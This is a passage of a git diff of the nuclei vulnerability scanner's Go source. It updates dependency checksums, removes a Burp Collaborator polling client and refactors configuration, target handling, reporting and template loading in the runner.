h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= @@ -436,10 +516,11 @@ golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7w golang.org/x/sys v0.0.0-20201113233024-12cec1faf1ba/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210217105451-b926d437f341/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210303074136-134d130e1a04/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210315160823-c6e025ad8005/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= -golang.org/x/sys v0.0.0-20210320140829-1e4c9ba3b0c4 h1:EZ2mChiOa8udjfp6rRmswTbtZN/QzUQp4ptM4rnjHvc= -golang.org/x/sys v0.0.0-20210320140829-1e4c9ba3b0c4/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= +golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b h1:qh4f65QIVFjq9eBURLEYWqaEXmOyqdUyiBSgaXWccWk= +golang.org/x/sys v0.0.0-20210601080250-7ecdf8ef093b/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201117132131-f5c789dd3221/go.mod h1:Nr5EML6q2oocZ2LXRh80K7BxOlk5/8JxuGnuhpl+muw= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/text v0.0.0-20170915032832-14c0d48ead0c/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= @@ -447,8 +528,9 @@ golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.1-0.20180807135948-17ff2d5776d2/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.2/go.mod h1:bEr9sfX3Q8Zfm5fL9x+3itogRgK3+ptLWKqgva+5dAk= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= -golang.org/x/text v0.3.4 h1:0YWbFKbhXG/wIiuHDSKpS0Iy7FSA+u45VtBMfQcFTTc= -golang.org/x/text v0.3.4/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= +golang.org/x/text v0.3.6 h1:aRYxNxv6iGQlyVaZmk6ZgYEDa+Jg18DxebPSrd6bg1M= +golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/time v0.0.0-20181108054448-85acf8d2951c/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20190308202827-9d24e82272b4/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= golang.org/x/time v0.0.0-20191024005414-555d28b269f0/go.mod h1:tRJNPiyCQ0inRvYxbN9jk5I+vvW/OXSQhTDSoE431IQ= @@ -581,6 +663,7 @@ google.golang.org/protobuf v1.26.0 h1:bxAC2xTBsZGibn2RTntX0oH50xLsqy1OxA9tTL3p/l google.golang.org/protobuf v1.26.0/go.mod 
h1:9q0QmTI4eRPtz6boOQmLYwt+qCgq0jsYwAQnmE0givc= gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20180628173108-788fd7840127/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= +gopkg.in/check.v1 v1.0.0-20190902080502-41f04d3bba15/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c h1:Hei/4ADfdWqJk1ZMxUNpqntNwaWcugrBjAiHlqqRiVk= gopkg.in/check.v1 v1.0.0-20201130134442-10cb98267c6c/go.mod h1:JHkPIbrfpd72SG/EVd6muEfDQjcINNoR0C8j2r3qZ4Q= gopkg.in/corvus-ch/zbase32.v1 v1.0.0 h1:K4u1NprbDNvKPczKfHLbwdOWHTZ0zfv2ow71H1nRnFU= @@ -595,6 +678,7 @@ gopkg.in/yaml.v2 v2.2.2/go.mod h1:hI93XBmqTisBFMUTm0b8Fm+jr3Dg1NNxqwp+5A1VGuI= gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= +gopkg.in/yaml.v3 v3.0.0-20200605160147-a5ece683394c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= honnef.co/go/tools v0.0.0-20190102054323-c2f93a96b099/go.mod h1:rf3lG4BRIbNafJWhAfAdb/ePZxsR/4RtNHQocxwk9r4= diff --git a/v2/internal/collaborator/collaborator.go b/v2/internal/collaborator/collaborator.go deleted file mode 100644 index 076e18a8aa..0000000000 --- a/v2/internal/collaborator/collaborator.go +++ /dev/null @@ -1,72 +0,0 @@ -package collaborator - -import ( - "strings" - "sync" - "time" - - "github.com/projectdiscovery/collaborator" -) - -var ( - // PollSeconds is the seconds to poll at. - PollSeconds = 5 - // DefaultMaxBufferLimit is the default request buffer limit - DefaultMaxBufferLimit = 150 - // DefaultPollInterval is the default poll interval for burp collabortor polling. 
- DefaultPollInterval time.Duration = time.Second * time.Duration(PollSeconds) - // DefaultCollaborator is the default burp collaborator instance - DefaultCollaborator = &Collaborator{Collab: collaborator.NewBurpCollaborator()} -) - -// Collaborator is a client for recording burp collaborator interactions -type Collaborator struct { - sync.RWMutex - options *Options // unused - Collab *collaborator.BurpCollaborator -} - -// Options contains configuration options for collaborator client -type Options struct { - BIID string - PollInterval time.Duration - MaxBufferLimit int -} - -// New creates a new collaborator client -func New(options *Options) *Collaborator { - collab := collaborator.NewBurpCollaborator() - collab.AddBIID(options.BIID) - collab.MaxBufferLimit = options.MaxBufferLimit - return &Collaborator{Collab: collab, options: options} -} - -// Poll initiates collaborator polling if any BIIDs were provided -func (b *Collaborator) Poll() { - // if no valid biids were provided just return - if len(b.Collab.BIIDs) > 0 { - go b.Collab.PollEach(DefaultPollInterval) - } -} - -// Has checks if a collabrator hit was found for a URL -func (b *Collaborator) Has(s string) bool { - for _, r := range b.Collab.RespBuffer { - for i := 0; i < len(r.Responses); i++ { - // search in dns - http - smtp - b.RLock() - found := strings.Contains(r.Responses[i].Data.RawRequestDecoded, s) || - strings.Contains(r.Responses[i].Data.RequestDecoded, s) || - strings.Contains(r.Responses[i].Data.MessageDecoded, s) - b.RUnlock() - - if found { - b.Lock() - r.Responses = append(r.Responses[:i], r.Responses[i+1:]...) - b.Unlock() - return true - } - } - } - return false -} diff --git a/v2/internal/runner/banner.go b/v2/internal/runner/banner.go index cc17165868..36196349d7 100644 --- a/v2/internal/runner/banner.go +++ b/v2/internal/runner/banner.go @@ -1,17 +1,19 @@ package runner -import "github.com/projectdiscovery/gologger" +import ( + "fmt" -const banner = ` - __ _ - ____ __ _______/ /__ (_) - / __ \/ / / / ___/ / _ \/ / - / / / / /_/ / /__/ / __/ / - /_/ /_/\__,_/\___/_/\___/_/ v2.3.6 -` + "github.com/projectdiscovery/gologger" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" +) -// Version is the current version of nuclei -const Version = `2.3.6` +var banner = fmt.Sprintf(` + __ _ + ____ __ _______/ /__ (_) + / __ \/ / / / ___/ / _ \/ / + / / / / /_/ / /__/ / __/ / +/_/ /_/\__,_/\___/_/\___/_/ %s +`, config.Version) // showBanner is used to show the banner to the user func showBanner() { diff --git a/v2/internal/runner/config.go b/v2/internal/runner/config.go index fe8a62e2ca..75c10db611 100644 --- a/v2/internal/runner/config.go +++ b/v2/internal/runner/config.go @@ -1,128 +1 @@ package runner - -import ( - "os" - "path/filepath" - "regexp" - "time" - - jsoniter "github.com/json-iterator/go" - "github.com/projectdiscovery/gologger" - "gopkg.in/yaml.v2" -) - -// nucleiConfig contains some configuration options for nuclei -type nucleiConfig struct { - TemplatesDirectory string `json:"templates-directory,omitempty"` - CurrentVersion string `json:"current-version,omitempty"` - LastChecked time.Time `json:"last-checked,omitempty"` - IgnoreURL string `json:"ignore-url,omitempty"` - NucleiVersion string `json:"nuclei-version,omitempty"` - LastCheckedIgnore time.Time `json:"last-checked-ignore,omitempty"` - // IgnorePaths ignores all the paths listed unless specified manually - IgnorePaths []string `json:"ignore-paths,omitempty"` -} - -// nucleiConfigFilename is the filename of nuclei configuration file. 
-const nucleiConfigFilename = ".templates-config.json" - -var reVersion = regexp.MustCompile(`\d+\.\d+\.\d+`) - -// readConfiguration reads the nuclei configuration file from disk. -func readConfiguration() (*nucleiConfig, error) { - home, err := os.UserHomeDir() - if err != nil { - return nil, err - } - configDir := filepath.Join(home, "/.config", "/nuclei") - _ = os.MkdirAll(configDir, os.ModePerm) - - templatesConfigFile := filepath.Join(configDir, nucleiConfigFilename) - file, err := os.Open(templatesConfigFile) - if err != nil { - return nil, err - } - defer file.Close() - - config := &nucleiConfig{} - err = jsoniter.NewDecoder(file).Decode(config) - if err != nil { - return nil, err - } - return config, nil -} - -// readConfiguration reads the nuclei configuration file from disk. -func (r *Runner) writeConfiguration(config *nucleiConfig) error { - home, err := os.UserHomeDir() - if err != nil { - return err - } - configDir := filepath.Join(home, "/.config", "/nuclei") - _ = os.MkdirAll(configDir, os.ModePerm) - - if config.IgnoreURL == "" { - config.IgnoreURL = "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/.nuclei-ignore" - } - config.LastChecked = time.Now() - config.LastCheckedIgnore = time.Now() - config.NucleiVersion = Version - templatesConfigFile := filepath.Join(configDir, nucleiConfigFilename) - file, err := os.OpenFile(templatesConfigFile, os.O_WRONLY|os.O_CREATE, 0777) - if err != nil { - return err - } - defer file.Close() - - err = jsoniter.NewEncoder(file).Encode(config) - if err != nil { - return err - } - return nil -} - -const nucleiIgnoreFile = ".nuclei-ignore" - -type ignoreFile struct { - Tags []string `yaml:"tags"` - Files []string `yaml:"files"` -} - -// readNucleiIgnoreFile reads the nuclei ignore file marking it in map -func (r *Runner) readNucleiIgnoreFile() { - file, err := os.Open(r.getIgnoreFilePath()) - if err != nil { - gologger.Error().Msgf("Could not read nuclei-ignore file: %s\n", err) - return - } - defer file.Close() - - ignore := &ignoreFile{} - if err := yaml.NewDecoder(file).Decode(ignore); err != nil { - gologger.Error().Msgf("Could not parse nuclei-ignore file: %s\n", err) - return - } - r.options.ExcludeTags = append(r.options.ExcludeTags, ignore.Tags...) - r.templatesConfig.IgnorePaths = append(r.templatesConfig.IgnorePaths, ignore.Files...) 
-} - -// getIgnoreFilePath returns the ignore file path for the runner -func (r *Runner) getIgnoreFilePath() string { - var defIgnoreFilePath string - - home, err := os.UserHomeDir() - if err == nil { - configDir := filepath.Join(home, "/.config", "/nuclei") - _ = os.MkdirAll(configDir, os.ModePerm) - - defIgnoreFilePath = filepath.Join(configDir, nucleiIgnoreFile) - return defIgnoreFilePath - } - cwd, err := os.Getwd() - if err != nil { - return defIgnoreFilePath - } - - cwdIgnoreFilePath := filepath.Join(cwd, nucleiIgnoreFile) - return cwdIgnoreFilePath -} diff --git a/v2/internal/runner/options.go b/v2/internal/runner/options.go index 6b55c4aa41..f976436952 100644 --- a/v2/internal/runner/options.go +++ b/v2/internal/runner/options.go @@ -10,6 +10,7 @@ import ( "github.com/projectdiscovery/gologger" "github.com/projectdiscovery/gologger/formatter" "github.com/projectdiscovery/gologger/levels" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" "github.com/projectdiscovery/nuclei/v2/pkg/protocols/common/protocolinit" "github.com/projectdiscovery/nuclei/v2/pkg/types" ) @@ -26,15 +27,15 @@ func ParseOptions(options *types.Options) { showBanner() if options.Version { - gologger.Info().Msgf("Current Version: %s\n", Version) + gologger.Info().Msgf("Current Version: %s\n", config.Version) os.Exit(0) } if options.TemplatesVersion { - config, err := readConfiguration() + configuration, err := config.ReadConfiguration() if err != nil { gologger.Fatal().Msgf("Could not read template configuration: %s\n", err) } - gologger.Info().Msgf("Current nuclei-templates version: %s (%s)\n", config.CurrentVersion, config.TemplatesDirectory) + gologger.Info().Msgf("Current nuclei-templates version: %s (%s)\n", configuration.CurrentVersion, configuration.TemplatesDirectory) os.Exit(0) } @@ -83,13 +84,6 @@ func validateOptions(options *types.Options) error { return errors.New("both verbose and silent mode specified") } - if !options.TemplateList { - // Check if a list of templates was provided and it exists - if len(options.Templates) == 0 && !options.NewTemplates && len(options.Workflows) == 0 && len(options.AdvancedWorkflows) == 0 && len(options.Tags) == 0 && !options.UpdateTemplates { - return errors.New("no template/templates provided") - } - } - // Validate proxy options if provided err := validateProxyURL(options.ProxyURL, "invalid http proxy format (It should be http://username:password@host:port)") if err != nil { diff --git a/v2/internal/runner/runner.go b/v2/internal/runner/runner.go index 145ba0967c..8c14698c63 100644 --- a/v2/internal/runner/runner.go +++ b/v2/internal/runner/runner.go @@ -4,16 +4,19 @@ import ( "bufio" "fmt" "os" + "path" "path/filepath" "strings" "time" "github.com/logrusorgru/aurora" + "github.com/pkg/errors" "github.com/projectdiscovery/gologger" "github.com/projectdiscovery/hmap/store/hybrid" - "github.com/projectdiscovery/nuclei/v2/internal/collaborator" "github.com/projectdiscovery/nuclei/v2/internal/colorizer" "github.com/projectdiscovery/nuclei/v2/pkg/catalog" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/config" + "github.com/projectdiscovery/nuclei/v2/pkg/catalog/loader" "github.com/projectdiscovery/nuclei/v2/pkg/output" "github.com/projectdiscovery/nuclei/v2/pkg/progress" "github.com/projectdiscovery/nuclei/v2/pkg/projectfile" @@ -24,6 +27,7 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/protocols/headless/engine" "github.com/projectdiscovery/nuclei/v2/pkg/reporting" "github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/disk" + 
"github.com/projectdiscovery/nuclei/v2/pkg/reporting/exporters/sarif" "github.com/projectdiscovery/nuclei/v2/pkg/templates" "github.com/projectdiscovery/nuclei/v2/pkg/types" "github.com/remeh/sizedwaitgroup" @@ -39,7 +43,7 @@ type Runner struct { output output.Writer interactsh *interactsh.Client inputCount int64 - templatesConfig *nucleiConfig + templatesConfig *config.Config options *types.Options projectFile *projectfile.ProjectFile catalog *catalog.Catalog @@ -56,35 +60,35 @@ func New(options *types.Options) (*Runner, error) { runner := &Runner{ options: options, } - if options.Headless { - browser, err := engine.New(options) - if err != nil { + if options.UpdateNuclei { + if err := updateNucleiVersionToLatest(runner.options.Verbose); err != nil { return nil, err } - runner.browser = browser + return nil, nil } if err := runner.updateTemplates(); err != nil { gologger.Warning().Msgf("Could not update templates: %s\n", err) } - // Read nucleiignore file if given a templateconfig - if runner.templatesConfig != nil { - runner.readNucleiIgnoreFile() + if options.Headless { + browser, err := engine.New(options) + if err != nil { + return nil, err + } + runner.browser = browser } runner.catalog = catalog.New(runner.options.TemplatesDirectory) - runner.catalog.AppendIgnore(runner.templatesConfig.IgnorePaths) - var reportingOptions *reporting.Options if options.ReportingConfig != "" { file, err := os.Open(options.ReportingConfig) if err != nil { - gologger.Fatal().Msgf("Could not open reporting config file: %s\n", err) + return nil, errors.Wrap(err, "could not open reporting config file") } reportingOptions = &reporting.Options{} if parseErr := yaml.NewDecoder(file).Decode(reportingOptions); parseErr != nil { file.Close() - gologger.Fatal().Msgf("Could not parse reporting config file: %s\n", parseErr) + return nil, errors.Wrap(parseErr, "could not parse reporting config file") } file.Close() } @@ -96,12 +100,20 @@ func New(options *types.Options) (*Runner, error) { reportingOptions.DiskExporter = &disk.Options{Directory: options.DiskExportDirectory} } } - if reportingOptions != nil { - if client, err := reporting.New(reportingOptions, options.ReportingDB); err != nil { - gologger.Fatal().Msgf("Could not create issue reporting client: %s\n", err) + if options.SarifExport != "" { + if reportingOptions != nil { + reportingOptions.SarifExporter = &sarif.Options{File: options.SarifExport} } else { - runner.issuesClient = client + reportingOptions = &reporting.Options{} + reportingOptions.SarifExporter = &sarif.Options{File: options.SarifExport} + } + } + if reportingOptions != nil { + client, err := reporting.New(reportingOptions, options.ReportingDB) + if err != nil { + return nil, errors.Wrap(err, "could not create issue reporting client") } + runner.issuesClient = client } // output coloring @@ -114,23 +126,35 @@ func New(options *types.Options) (*Runner, error) { os.Exit(0) } - if (len(options.Templates) == 0 || !options.NewTemplates || (options.Targets == "" && !options.Stdin && options.Target == "")) && options.UpdateTemplates { + if (len(options.Templates) == 0 || !options.NewTemplates || (options.TargetsFilePath == "" && !options.Stdin && len(options.Targets) == 0)) && options.UpdateTemplates { os.Exit(0) } - if hm, err := hybrid.New(hybrid.DefaultDiskOptions); err != nil { - gologger.Fatal().Msgf("Could not create temporary input file: %s\n", err) - } else { - runner.hostMap = hm + hm, err := hybrid.New(hybrid.DefaultDiskOptions) + if err != nil { + return nil, errors.Wrap(err, "could not 
create temporary input file") } + runner.hostMap = hm runner.inputCount = 0 dupeCount := 0 - // Handle single target - if options.Target != "" { - runner.inputCount++ - // nolint:errcheck // ignoring error - runner.hostMap.Set(options.Target, nil) + // Handle multiple target + if len(options.Targets) != 0 { + for _, target := range options.Targets { + url := strings.TrimSpace(target) + if url == "" { + continue + } + + if _, ok := runner.hostMap.Get(url); ok { + dupeCount++ + continue + } + + runner.inputCount++ + // nolint:errcheck // ignoring error + runner.hostMap.Set(url, nil) + } } // Handle stdin @@ -141,21 +165,23 @@ func New(options *types.Options) (*Runner, error) { if url == "" { continue } + if _, ok := runner.hostMap.Get(url); ok { dupeCount++ continue } + runner.inputCount++ // nolint:errcheck // ignoring error runner.hostMap.Set(url, nil) } } - // Handle taget file - if options.Targets != "" { - input, err := os.Open(options.Targets) - if err != nil { - gologger.Fatal().Msgf("Could not open targets file '%s': %s\n", options.Targets, err) + // Handle target file + if options.TargetsFilePath != "" { + input, inputErr := os.Open(options.TargetsFilePath) + if inputErr != nil { + return nil, errors.Wrap(inputErr, "could not open targets file") } scanner := bufio.NewScanner(input) for scanner.Scan() { @@ -181,13 +207,19 @@ func New(options *types.Options) (*Runner, error) { // Create the output file if asked outputWriter, err := output.NewStandardWriter(!options.NoColor, options.NoMeta, options.JSON, options.Output, options.TraceLogFile) if err != nil { - gologger.Fatal().Msgf("Could not create output file '%s': %s\n", options.Output, err) + return nil, errors.Wrap(err, "could not create output file") } runner.output = outputWriter + if options.JSON && options.EnableProgressBar { + options.StatsJSON = true + } + if options.StatsJSON { + options.EnableProgressBar = true + } // Creates the progress tracking object var progressErr error - runner.progress, progressErr = progress.NewStatsTicker(options.StatsInterval, options.EnableProgressBar, options.Metrics, options.MetricsPort) + runner.progress, progressErr = progress.NewStatsTicker(options.StatsInterval, options.EnableProgressBar, options.StatsJSON, options.Metrics, options.MetricsPort) if progressErr != nil { return nil, progressErr } @@ -213,17 +245,15 @@ func New(options *types.Options) (*Runner, error) { Progress: runner.progress, }) if err != nil { - return nil, err + gologger.Error().Msgf("Could not create interactsh client: %s", err) + } else { + runner.interactsh = interactshClient } - runner.interactsh = interactshClient - } - - // Enable Polling - if options.BurpCollaboratorBiid != "" { - collaborator.DefaultCollaborator.Collab.AddBIID(options.BurpCollaboratorBiid) } - if options.RateLimit > 0 { + if options.RateLimitMinute > 0 { + runner.ratelimiter = ratelimit.New(options.RateLimitMinute, ratelimit.Per(60*time.Second)) + } else if options.RateLimit > 0 { runner.ratelimiter = ratelimit.New(options.RateLimit) } else { runner.ratelimiter = ratelimit.NewUnlimited() @@ -246,52 +276,110 @@ func (r *Runner) Close() { // RunEnumeration sets up the input layer for giving input nuclei. 
// binary and runs the actual enumeration -func (r *Runner) RunEnumeration() { +func (r *Runner) RunEnumeration() error { defer r.Close() - // If we have no templates, run on whole template directory with provided tags - if len(r.options.Templates) == 0 && len(r.options.Workflows) == 0 && len(r.options.AdvancedWorkflows) == 0 && !r.options.NewTemplates && (len(r.options.Tags) > 0 || len(r.options.ExcludeTags) > 0) { - r.options.Templates = append(r.options.Templates, r.options.TemplatesDirectory) - } + // If user asked for new templates to be executed, collect the list from template directory. if r.options.NewTemplates { templatesLoaded, err := r.readNewTemplatesFile() if err != nil { - gologger.Warning().Msgf("Could not get newly added templates: %s\n", err) + return errors.Wrap(err, "could not get newly added templates") } r.options.Templates = append(r.options.Templates, templatesLoaded...) } - includedTemplates := r.catalog.GetTemplatesPath(r.options.Templates, false) - excludedTemplates := r.catalog.GetTemplatesPath(r.options.ExcludedTemplates, true) - // defaults to all templates - allTemplates := includedTemplates + ignoreFile := config.ReadIgnoreFile() + r.options.ExcludeTags = append(r.options.ExcludeTags, ignoreFile.Tags...) + r.options.ExcludedTemplates = append(r.options.ExcludedTemplates, ignoreFile.Files...) + + executerOpts := protocols.ExecuterOptions{ + Output: r.output, + Options: r.options, + Progress: r.progress, + Catalog: r.catalog, + IssuesClient: r.issuesClient, + RateLimiter: r.ratelimiter, + Interactsh: r.interactsh, + ProjectFile: r.projectFile, + Browser: r.browser, + } + loaderConfig := loader.Config{ + Templates: r.options.Templates, + Workflows: r.options.Workflows, + ExcludeTemplates: r.options.ExcludedTemplates, + Tags: r.options.Tags, + ExcludeTags: r.options.ExcludeTags, + IncludeTemplates: r.options.IncludeTemplates, + Authors: r.options.Author, + Severities: r.options.Severity, + IncludeTags: r.options.IncludeTags, + TemplatesDirectory: r.options.TemplatesDirectory, + Catalog: r.catalog, + ExecutorOptions: executerOpts, + } + store, err := loader.New(&loaderConfig) + if err != nil { + return errors.Wrap(err, "could not load templates from config") + } + if r.options.Validate { + if !store.ValidateTemplates(r.options.Templates, r.options.Workflows) { + return errors.New("an error occurred during templates validation") + } + gologger.Info().Msgf("All templates validated successfully\n") + return nil // exit + } + store.Load() + + builder := &strings.Builder{} + if r.templatesConfig != nil && r.templatesConfig.NucleiLatestVersion != "" { + builder.WriteString(" (") - if len(excludedTemplates) > 0 { - excludedMap := make(map[string]struct{}, len(excludedTemplates)) - for _, excl := range excludedTemplates { - excludedMap[excl] = struct{}{} + if strings.Contains(config.Version, "-dev") { + builder.WriteString(r.colorizer.Blue("development").String()) + } else if config.Version == r.templatesConfig.NucleiLatestVersion { + builder.WriteString(r.colorizer.Green("latest").String()) + } else { + builder.WriteString(r.colorizer.Red("outdated").String()) } - // rebuild list with only non-excluded templates - allTemplates = []string{} + builder.WriteString(")") + } + messageStr := builder.String() + builder.Reset() - for _, incl := range includedTemplates { - if _, found := excludedMap[incl]; !found { - allTemplates = append(allTemplates, incl) - } else { - gologger.Warning().Msgf("Excluding '%s'", incl) - } + gologger.Info().Msgf("Using Nuclei Engine %s%s", 
config.Version, messageStr) + + if r.templatesConfig != nil && r.templatesConfig.NucleiTemplatesLatestVersion != "" { + builder.WriteString(" (") + + if r.templatesConfig.CurrentVersion == r.templatesConfig.NucleiTemplatesLatestVersion { + builder.WriteString(r.colorizer.Green("latest").String()) + } else { + builder.WriteString(r.colorizer.Red("outdated").String()) } + builder.WriteString(")") + } + messageStr = builder.String() + builder.Reset() + + gologger.Info().Msgf("Using Nuclei Templates %s%s", r.templatesConfig.CurrentVersion, messageStr) + + if r.interactsh != nil { + gologger.Info().Msgf("Using Interactsh Server %s", r.options.InteractshURL) + } + if len(store.Templates()) > 0 { + gologger.Info().Msgf("Templates loaded: %d (New: %d)", len(store.Templates()), r.countNewTemplates()) + } + if len(store.Workflows()) > 0 { + gologger.Info().Msgf("Workflows loaded: %d", len(store.Workflows())) } // pre-parse all the templates, apply filters finalTemplates := []*templates.Template{} - workflowPaths := r.catalog.GetTemplatesPath(r.options.Workflows, false) - availableTemplates, _ := r.getParsedTemplatesFor(allTemplates, r.options.Severity, Template) - availableWorkflows, workflowCount := r.getParsedTemplatesFor(workflowPaths, r.options.Severity, Workflows) - advancedWorkflowPaths := r.catalog.GetTemplatesPath(r.options.AdvancedWorkflows, false) + advancedWorkflowPaths := r.catalog.GetTemplatesPath(r.options.AdvancedWorkflows) availableAdvancedWorkflows, advancedWorkflowCount := r.getParsedTemplatesFor(advancedWorkflowPaths, r.options.Severity, AdvancedWorkflow) - var unclusteredRequests int64 = 0 - for _, template := range availableTemplates { + _ = advancedWorkflowCount + var unclusteredRequests int64 + for _, template := range store.Templates() { // workflows will dynamically adjust the totals while running, as // it can't be know in advance which requests will be called if len(template.Workflows) > 0 { @@ -300,9 +388,21 @@ func (r *Runner) RunEnumeration() { unclusteredRequests += int64(template.TotalRequests) * r.inputCount } - originalTemplatesCount := len(availableTemplates) + if r.options.VerboseVerbose { + for _, template := range store.Templates() { + r.logAvailableTemplate(template.Path) + } + for _, template := range store.Workflows() { + r.logAvailableTemplate(template.Path) + } + } + templatesMap := make(map[string]*templates.Template) + for _, v := range store.Templates() { + templatesMap[v.ID] = v + } + originalTemplatesCount := len(store.Templates()) clusterCount := 0 - clusters := clusterer.Cluster(availableTemplates) + clusters := clusterer.Cluster(templatesMap) for _, cluster := range clusters { if len(cluster) > 1 && !r.options.OfflineHTTP { executerOpts := protocols.ExecuterOptions{ @@ -329,14 +429,12 @@ func (r *Runner) RunEnumeration() { finalTemplates = append(finalTemplates, cluster...) } } - for _, workflows := range availableWorkflows { - finalTemplates = append(finalTemplates, workflows) - } for _, advancedWorkflow := range availableAdvancedWorkflows { finalTemplates = append(finalTemplates, advancedWorkflow) } + finalTemplates = append(finalTemplates, store.Workflows()...) 
- var totalRequests int64 = 0 + var totalRequests int64 for _, t := range finalTemplates { if len(t.Workflows) > 0 { continue @@ -344,25 +442,18 @@ func (r *Runner) RunEnumeration() { totalRequests += int64(t.TotalRequests) * r.inputCount } if totalRequests < unclusteredRequests { - gologger.Info().Msgf("Reduced %d requests to %d (%d templates clustered)", unclusteredRequests, totalRequests, clusterCount) + gologger.Info().Msgf("Templates clustered: %d (Reduced %d HTTP Requests)", clusterCount, unclusteredRequests-totalRequests) } - templateCount := originalTemplatesCount + len(availableWorkflows) + len(availableAdvancedWorkflows) + workflowCount := len(store.Workflows()) + templateCount := originalTemplatesCount + workflowCount + +len(availableAdvancedWorkflows) // 0 matches means no templates were found in directory if templateCount == 0 { - gologger.Fatal().Msgf("Error, no templates were found.\n") + return errors.New("no templates were found") } - gologger.Info().Msgf("Using %s rules (%s templates, %s workflows, %s advanced workflows)", - r.colorizer.Bold(templateCount).String(), - r.colorizer.Bold(templateCount-workflowCount-advancedWorkflowCount).String(), - r.colorizer.Bold(workflowCount).String(), - r.colorizer.Bold(advancedWorkflowCount).String()) - results := &atomic.Bool{} wgtemplates := sizedwaitgroup.New(r.options.TemplateThreads) - // Starts polling or ignore - collaborator.DefaultCollaborator.Poll() // tracks global progress and captures stdout/stderr until p.Wait finishes r.progress.Init(r.inputCount, templateCount, totalRequests) @@ -395,16 +486,12 @@ func (r *Runner) RunEnumeration() { r.issuesClient.Close() } if !results.Load() { - if r.output != nil { - r.output.Close() - os.Remove(r.options.Output) - } gologger.Info().Msgf("No results found. 
Better luck next time!") } - if r.browser != nil { r.browser.Close() } + return nil } // readNewTemplatesFile reads newly added templates from directory if it exists @@ -427,3 +514,24 @@ func (r *Runner) readNewTemplatesFile() ([]string, error) { } return templatesList, nil } + +// readNewTemplatesFile reads newly added templates from directory if it exists +func (r *Runner) countNewTemplates() int { + additionsFile := path.Join(r.templatesConfig.TemplatesDirectory, ".new-additions") + file, err := os.Open(additionsFile) + if err != nil { + return 0 + } + defer file.Close() + + count := 0 + scanner := bufio.NewScanner(file) + for scanner.Scan() { + text := scanner.Text() + if text == "" { + continue + } + count++ + } + return count +} diff --git a/v2/internal/runner/templates.go b/v2/internal/runner/templates.go index 8e65f49006..b570018930 100644 --- a/v2/internal/runner/templates.go +++ b/v2/internal/runner/templates.go @@ -1,15 +1,17 @@ package runner import ( + "bytes" "fmt" + "io/ioutil" "os" "strings" "github.com/karrick/godirwalk" "github.com/projectdiscovery/gologger" - 